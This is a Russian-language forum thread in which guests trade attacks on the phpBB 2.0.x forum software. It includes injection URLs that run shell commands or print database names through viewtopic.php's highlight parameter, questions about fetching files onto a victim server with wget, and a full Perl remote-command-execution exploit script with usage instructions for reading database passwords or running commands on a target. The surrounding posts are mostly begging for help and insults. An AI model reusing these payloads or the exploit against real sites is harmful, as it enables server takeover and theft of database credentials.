SQL-инъекция и php инклудинг в phpBB

Гость Guest	#121 Это нравится:0 Да/0 Нет 24.01.2006 15:18:58 Пожайлуста кокретно опишите как с помощьб wget залить файл У меня заработало: http://....../forum/viewtopic.php?t=277&highlight=%2527.$poster=%60ls%09-la%60.%2527 как теперь дальше :help:

Гость Guest	#122 Это нравится:0 Да/0 Нет 26.01.2006 04:13:56 Смотри руководство. надо копировать на серв с удаленного сервака. если не хватает мозгов, как это делать. нехер вообще этим заниматься дуй в школу учи уроки мама наругает

Проходной

Guest

#123

Это нравится:0 Да/0 Нет

29.01.2006 21:03:51

Parse error: parse error, unexpected T_STRING in f:\appserv\www\phpbb2\viewtopic.php(1104) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>This is an example post in your phpBB 2 installation. You may delete this post, this topic and even this forum if you like since everything seems to be working!<') in f:\appserv\www\phpbb2\viewtopic.php on line 1104

Вот что выдаёт при инъекции phpbb2.06 =\

Проходной Guest	#124 Это нравится:0 Да/0 Нет 29.01.2006 21:05:45 Ой извените, не на тот сайт отправил ... =)

tyz Guest	#125 Это нравится:0 Да/0 Нет 20.03.2006 19:50:41 Я не понимаю, пишу в адресной строке viewtopic.php?t=1&highlight=%2527.$poster=$dbname.%2527, и ничего... Может ли быть, что нет переменной $poster, а если ее нет, то какя есть?

dany_the_dog Guest	#126 Это нравится:0 Да/0 Нет 08.05.2006 23:57:01 народ так задолбался с етим phpbb! может ктота поможет плизз!оставте асю кто поможет я стукну пообшаимся!прашу пожалуста!зарание спасиба

abatishchev

Guest

#127

Это нравится:0 Да/0 Нет

11.05.2006 22:10:24

Код

#!/usr/bin/perl -w
#phpBB up to 2.0.10 remote command execution exploit, version 1.3.2
#Coded by Godfather (C) 2004-2006
#Additional code by RusH, Ramil
#
#Tested on local phpBB 2.0.10 and http://www.irony.ru/forum/

use IO::Socket;

$success = 0;

if (@ARGV != 4)
{
     print q(
#phpBB up to 2.0.10 remote command execution exploit by Godfather
#version 1.3.2
#Godfather (C) 2004-2006, Ramil (C) 2005
#usage: phpbb-210-gf.pl [URL] [DIR] [NUM] [CMD]
#params:
# [URL] - server url e.g. www.phpbb.com
# [DIR] - directory where phpBB installed e.g. /phpBB/ or /
# [NUM] - number of last existed topic
# [CMD] - command to execute e.g. $dbname, $dbpasswd,
#         ls%09-la or dir%09/a%09/b%09/ogn
#         (for space use symbol %09 instead of %20)
);
     exit;
}

$host = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

#$cmd =~ s/(.)/"%".uc(sprintf("%2.2x", ord($1)))/eg; #convert $cmd to %xx
$cmd =~ s/( )/%09/; #replace space to %09

$host =~ s/(http:\/\/)//eg;                         #remove http:// from $host
#$topic =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; #convert $topic to %xx

$path = $dir;
$path .= "viewtopic.php?t=";
$path .= $topic;
$path .= "&highlight=%2527.%24poster=";

#&highlight=%2527.$poster=$cmd.%2527

print "[~] Connecting to http://$host:80\n";

if(@ARGV == 4)
{
   print "[~] Reading socket..\n";
   $request .= $path;
   $request .= $cmd;
   $request .= ".%2527";
   print "[~] Requesting http://$host$request\n";
   $socket = IO::Socket::INET->new(Proto => "tcp",
                                   PeerAddr => $host,
                                   PeerPort => "80") || die "[-] Connection failed";
   $socket->autoflush(1);

   print $socket "GET $request HTTP/1.1\r\n";
   print $socket "Host: $host\n";
   print $socket "Accept: */*\n";
   print $socket "Http-Referer: http://www.microsoft.com\n";
   print $socket "User-Agent: Mozilla/4.7 [en] (Win95; I)\n";
   print $socket "Pragma: no-cache\n";
   print $socket "Cache-Control: no-cache\n";
   print $socket "Connection: close\n\n";

   $answer = $socket->accept();
   while ($answer = <$socket>)
   {
      #obtain string with between 'b>' or 'b]' and ')\b#i'
      if($answer =~ /b>(.+?)\)\\b#i/i)
      {   
         $exploit = $1;
         $success = 1;
      }
   }
   close $socket;
   goto end;
}
end:

if ($success == 1)
{
   print "[!] \$cmd : \n";
   print "$exploit\n";
   print "[+] Done!";
}
else
{
   print "[-] Exploit failed or answer is empty!";
}

### EOF ###

Не Хакер Guest	#128 Это нравится:0 Да/0 Нет 19.07.2006 15:30:04 Заколупали тупые ублюдки И не стыдно такие вопросы тупые задавать

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?